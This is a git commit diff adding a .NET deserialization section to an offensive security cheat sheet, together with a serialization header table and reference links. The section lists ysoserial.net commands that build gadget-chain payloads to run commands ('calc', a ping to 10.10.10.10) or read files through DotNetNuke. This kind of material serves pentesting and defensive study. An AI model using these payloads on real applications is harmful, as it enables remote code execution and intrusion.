.NET Deserialization

This commit is contained in:
Swissky 2022-10-11 21:52:46 +02:00
parent 3392980207
commit d88e32aaae
3 changed files with 69 additions and 3 deletions

View File

@ -0,0 +1,48 @@
# .NET Serialization
## Summary
* [Detection](#detection)
* [Exploit](#exploit)
* [References](#references)
## Detection
* `AAEAAD` (Hex) = .NET deserialization BinaryFormatter
* `FF01` (Hex) / `/w` (Base64) = .NET ViewState
Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=`
## Exploit
* [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net)
```ps1
$ cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s
$ ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini
$ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t
$ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
```
### JSON.NET
```ps1
./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t
```
### BinaryFormatter
> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data theyre processing to be trustworthy. BinaryFormatter is insecure and cant be made secure.
```ps1
./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t
```
## References
* [Attacking .NET deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q)
* [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - ALYSSA RAHMANDEC](https://www.mandiant.com/resources/blog/hunting-deserialization-exploits)
* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)

View File

@ -9,6 +9,15 @@ Check the following sub-sections, located in other files :
* [Ruby : universal rce gadget, ...](Ruby.md)
* [Python : pickle, ...](Python.md)
* [YAML : PyYAML, ...](YAML.md)
* [.NET : ysoserial.net, ...](DotNET.md)
| Object Type | Header (Hex) | Header (Base64) |
|-----------------|--------------|-----------------|
| Java Serialized | AC ED | rO |
| .NET ViewState | FF 01 | /w |
| Python Pickle | 80 04 95 | gASV |
| PHP Serialized | 4F 3A | Tz |
## LABS
@ -16,8 +25,8 @@ Check the following sub-sections, located in other files :
## References
* [Github - ysoserial](https://github.com/frohoff/ysoserial)
* [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net)
* [Github - frohoff/ysoserial](https://github.com/frohoff/ysoserial)
* [Github - pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net)
* [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
* [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
* [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
@ -33,4 +42,5 @@ Check the following sub-sections, located in other files :
* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e)
* [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh
* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf)
* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf)
* [Exploiting insecure deserialization vulnerabilities - PortSwigger](https://portswigger.net/web-security/deserialization/exploiting)

View File

@ -19,6 +19,14 @@
- [stacksmashing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw)
- [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ)
- [HACKING GOOGLE Series](https://www.youtube.com/watch?v=aOGFY1R4QQ4)
- [EP000: Operation Aurora | HACKING GOOGLE](https://youtu.be/przDcQe6n5o)
- [EP001: Threat Analysis Group | HACKING GOOGLE](https://youtu.be/N7N4EC20-cM)
- [EP002: Detection and Response | HACKING GOOGLE](https://youtu.be/QZ0cpBocl3c)
- [EP003: Red Team | HACKING GOOGLE](https://youtu.be/TusQWn2TQxQ)
- [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg)
- [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU)
## Conferences
- [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)